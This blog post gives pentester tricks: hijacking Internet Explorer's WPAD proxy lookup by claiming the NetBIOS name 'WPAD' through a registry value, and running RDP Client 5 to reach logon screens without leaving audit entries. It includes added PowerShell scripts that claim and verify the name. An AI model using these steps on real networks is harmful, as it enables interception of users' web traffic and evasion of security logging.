Wednesday, February 20, 2008

Pentester trick #2: faking NetBIOS names

Trick #2: faking NetBIOS names

There was quite a buzz at BlackHat US 2007 around H.D. Moore and Valsmith's attack against Internet Explorer's proxy autoconfiguration feature.

To sum up: with "Automatically detect settings" enabled (the default), Internet Explorer resolves the name "WPAD", fetches http://wpad/wpad.dat from whatever host answers, and treats that PAC file as the enterprise proxy configuration. Whoever owns the name chooses the proxy for every client on the network.

The original attack relies on the "Dynamic DNS Update" feature of Windows DNS servers. Dynamic updates can be:
  • DNS-based, unauthenticated (non-secure updates accepted). Game over: anyone on the network can register a "WPAD" record.
  • DNS-based, authenticated (secure updates only). Nice try, but since any domain user can by default create up to 10 computer accounts in Active Directory (ms-DS-MachineAccountQuota), it is quite easy to name a computer "WPAD", join it to the domain and register the record with the computer account's own credentials.
  • DHCP-based. Game over, too: the DHCP server registers the record on the client's behalf and the DNS server trusts the DHCP server, so whatever host name you put in your DHCP request is taken at face value.
Ok, but what if Dynamic DNS Update has been disabled? Or if you need to register a name quickly, without waiting for a computer account and a DNS record? Joining a new computer to the domain is not an option in those cases.

Fortunately, anyone who has sniffed a Windows network for more than five minutes knows that most Windows clients "in the wild" still run with the default, never reconfigured name resolution order: when DNS does not answer, they fall back to NBNS (NetBIOS Name Service) and broadcast the query on the local subnet.

So how do you take advantage of a broadcast NBNS query for "WPAD" (or any other name) to redirect the target's traffic to your own host?

One solution would be to use the FakeNetBIOS tools, but they rely on raw sockets, which are crippled on Windows XP SP2. Another would be to use Scapy as an NBNS responder, but the Windows port is not mature yet :)
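Whatever responder you end up using, it helps to see what the broadcast actually looks like on the wire and to be able to ask the subnet who currently claims a name. The following PowerShell is an added example, not code from the original post: it encodes a NetBIOS name the way NBNS does (RFC 1001 first-level encoding), broadcasts a name query for it on UDP 137 and lists the hosts that answer. Run it from a second machine on the same subnet; the broadcast address 192.168.1.255 is an assumption, replace it with your own.

```powershell
# Added example (not from the original post): NBNS name query probe.

function ConvertTo-NetBiosName {
    param([string]$Name, [byte]$Suffix = 0x00)
    # First-level encoding: name padded with spaces to 15 chars plus one suffix
    # byte; every byte is split into two nibbles, each written as 'A' + nibble.
    $bytes = [System.Text.Encoding]::ASCII.GetBytes($Name.ToUpper().PadRight(15)) + $Suffix
    $sb = New-Object System.Text.StringBuilder
    foreach ($b in $bytes) {
        [void]$sb.Append([char](0x41 + [int](($b -band 0xF0) / 16)))
        [void]$sb.Append([char](0x41 + ($b -band 0x0F)))
    }
    $sb.ToString()   # 32 chars; WPAD<00> -> FHFAEBEECACACACACACACACACACACAAA
}

function New-NbnsQuery {
    param([string]$Name, [byte]$Suffix = 0x00)
    $encoded = [System.Text.Encoding]::ASCII.GetBytes((ConvertTo-NetBiosName $Name $Suffix))
    # Header: transaction ID 0x1337 (arbitrary), flags 0x0110 = query, broadcast,
    # recursion desired; QDCOUNT = 1; ANCOUNT, NSCOUNT, ARCOUNT = 0.
    [byte[]]$header = 0x13, 0x37, 0x01, 0x10, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
    # Question: length 0x20, 32 encoded chars, 0x00 terminator, QTYPE NB (0x0020), QCLASS IN (1).
    [byte[]]$question = @(0x20) + $encoded + @(0x00, 0x00, 0x20, 0x00, 0x01)
    [byte[]]($header + $question)   # 50 bytes on the wire
}

function Find-NbnsNameOwners {
    param([string]$Name, [string]$Broadcast = '192.168.1.255', [int]$TimeoutMs = 2000)
    $query  = New-NbnsQuery -Name $Name
    $udp    = New-Object System.Net.Sockets.UdpClient
    $udp.EnableBroadcast = $true
    $udp.Client.ReceiveTimeout = $TimeoutMs
    $target = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($Broadcast), 137)
    [void]$udp.Send($query, $query.Length, $target)
    $remote = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any, 0)
    $owners = @()
    try {
        while ($true) {
            $resp = $udp.Receive([ref]$remote)
            # Positive name query response: 12-byte header (QR bit set, RCODE 0),
            # 34-byte name, TYPE(2) CLASS(2) TTL(4), RDLENGTH(2) at offset 54,
            # then 6-byte entries NB_FLAGS(2) + IPv4(4) starting at offset 56.
            if ($resp.Length -lt 56 -or ($resp[2] -band 0x80) -eq 0 -or ($resp[3] -band 0x0F) -ne 0) { continue }
            $rdlen = $resp[54] * 256 + $resp[55]
            for ($i = 56; ($i + 6 -le 56 + $rdlen) -and ($i + 6 -le $resp.Length); $i += 6) {
                $owners += New-Object PSObject -Property @{
                    Name      = $Name
                    Responder = $remote.Address.ToString()
                    ClaimedIp = ('{0}.{1}.{2}.{3}' -f $resp[$i+2], $resp[$i+3], $resp[$i+4], $resp[$i+5])
                }
            }
        }
    } catch {
        # Receive timed out: no more answers on this subnet.
    } finally {
        $udp.Close()
    }
    $owners
}

Find-NbnsNameOwners -Name 'WPAD' -Broadcast '192.168.1.255' | Format-Table Name, Responder, ClaimedIp -AutoSize
```

Running it before and after claiming a name shows exactly what a browser on the subnet will get: no answer at all for "WPAD" on a healthy network, and your own address once the trick below is in place. A response whose ClaimedIp differs from Responder is worth a second look, since that is what a proxy-style NBNS responder produces.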

As usual, the best solution is to rely on Windows built-in mechanisms to solve the puzzle.

Under HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters there is a value of type REG_MULTI_SZ called OptionalNames (create it if it does not exist).

Any name listed there is registered by the Server service as an additional NetBIOS name of the local computer, so the machine answers NBNS queries for it. The value is only read when the service starts, so restart it from an administrator prompt:

net stop lanmanserver
net start lanmanserver

Job done! Check with nbtstat -n that the name shows up as Registered in the local name table; from then on, any client on the subnet that falls back to NBNS for "WPAD" is sent to your host, which only has to serve wpad.dat on port 80. Keep in mind that the name is only claimed on your own broadcast domain, that restarting the Server service drops every SMB session on your machine, and that the cleanup is simply deleting the value and restarting the service again.
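The whole procedure, as an added PowerShell example (not the original post's commands, which are the two net lines above): it merges the names into OptionalNames instead of overwriting whatever is already there, restarts the Server service, verifies the registration with nbtstat -n, and provides the cleanup. Run it from an elevated prompt; the name list and the 3-second registration wait are assumptions.

```powershell
# Added example (not from the original post): claim extra NetBIOS names through
# LanmanServer\Parameters\OptionalNames and verify them. Requires administrator rights.
$LanmanKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Add-OptionalNetBiosName {
    param([string[]]$Names)
    # Keep any names already configured rather than clobbering them.
    $existing = @()
    $prop = Get-ItemProperty -Path $LanmanKey -Name OptionalNames -ErrorAction SilentlyContinue
    if ($prop) { $existing = @($prop.OptionalNames) }
    $merged = @($existing + $Names | ForEach-Object { $_.ToUpper() } | Select-Object -Unique)
    Set-ItemProperty -Path $LanmanKey -Name OptionalNames -Value $merged -Type MultiString
    # OptionalNames is read at service start. -Force also restarts dependent
    # services (e.g. Computer Browser) and drops all current SMB sessions.
    Restart-Service -Name LanmanServer -Force
    Start-Sleep -Seconds 3   # assumed: give NetBT time to finish name registration
}

function Test-LocalNetBiosName {
    param([string]$Name)
    # nbtstat -n prints the local name table, one line per name/suffix, e.g.
    #     WPAD           <00>  UNIQUE      Registered
    $table = nbtstat -n | Out-String
    $pattern = '(?m)^\s*' + [regex]::Escape($Name.ToUpper()) + '\s+<\w\w>\s+\w+\s+Registered'
    return [bool]($table -match $pattern)
}

function Remove-OptionalNetBiosNames {
    # Cleanup: drop the value and let the Server service re-register its normal names only.
    Remove-ItemProperty -Path $LanmanKey -Name OptionalNames -ErrorAction SilentlyContinue
    Restart-Service -Name LanmanServer -Force
}

Add-OptionalNetBiosName -Names 'WPAD'
if (Test-LocalNetBiosName -Name 'WPAD') {
    'WPAD is registered locally; answer http://wpad/wpad.dat on port 80 and you are in business.'
} else {
    'WPAD is not in the local name table; check nbtstat -n for a conflict with another host.'
}
```

If nbtstat -n shows the name as Conflict instead of Registered, another host on the subnet already holds it and defended it during registration; on a network where the name really matters that is something to notice rather than to fight over.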

Pentester trick #1: using RDP Client 5 on Vista

Nonop's recent post on pentester's essentials was inspiring enough to get me back on-line, on this long-abandoned blog.

So here is the first post of a (hopefully long) series about pentester tricks, from my very own field experience. Enjoy!

Trick #1: using RDP Client 5 on Vista

RDP Client 5 has one great advantage over RDP Client 6: it connects to the remote target without asking for any credentials first, so the pentester lands on the logon screen and can read the server version, computer name and trusted domains without leaving any trace in the security audit trail.

However, RDP Client 6 has been pushed through Windows Update for quite a while now, and is required in some cases, such as Windows Vista/2008 Remote Desktop with the full set of security options (Network Level Authentication), which are recommended given the flaws found in earlier versions of the RDP protocol.

Fortunately, it is quite easy to make both clients live side by side. RDP Client 5 consists of only two binaries: MSTSC.EXE and MSTSCAX.DLL. The trick is to copy both files into a directory of their own and to create an empty MSTSC.EXE.LOCAL file next to them. This DLL redirection ("DotLocal") makes MSTSC.EXE load MSTSCAX.DLL from its own directory instead of the system directory.
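As an added example (not part of the original post), the same three steps as a PowerShell function, with the one check that saves a wasted afternoon: confirming that the DLL you copied really is the 5.x control and not a second copy of client 6. The source path (an XP machine's system32 over an admin share) and the target directory are assumptions.

```powershell
# Added example (not from the original post): private copy of RDP Client 5
# next to the system RDP Client 6, using DotLocal DLL redirection.
$Source = '\\xp-box\c$\WINDOWS\system32'   # assumed: any XP box still holding client 5
$Target = 'C:\Tools\mstsc5'                 # assumed

function Install-Mstsc5 {
    param([string]$Source, [string]$Target)
    New-Item -ItemType Directory -Path $Target -Force | Out-Null
    foreach ($file in 'mstsc.exe', 'mstscax.dll') {
        Copy-Item -Path (Join-Path $Source $file) -Destination $Target -Force
    }
    # An empty mstsc.exe.local beside mstsc.exe makes the loader prefer DLLs
    # from this directory over the ones in %SystemRoot%\system32.
    New-Item -ItemType File -Path (Join-Path $Target 'mstsc.exe.local') -Force | Out-Null
    # Sanity check: the copied ActiveX control must carry a 5.x version.
    $ver = (Get-Item (Join-Path $Target 'mstscax.dll')).VersionInfo.FileVersion
    if ($ver -notlike '5.*') { throw "mstscax.dll in $Target is version $ver, not a client 5 build" }
    "RDP Client $ver installed in $Target; run $Target\mstsc.exe"
}

Install-Mstsc5 -Source $Source -Target $Target
```

Keep the copied client in its own directory and never in system32: the .local file only affects the mstsc.exe sitting next to it, so the system client 6 keeps working for the targets that require it.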
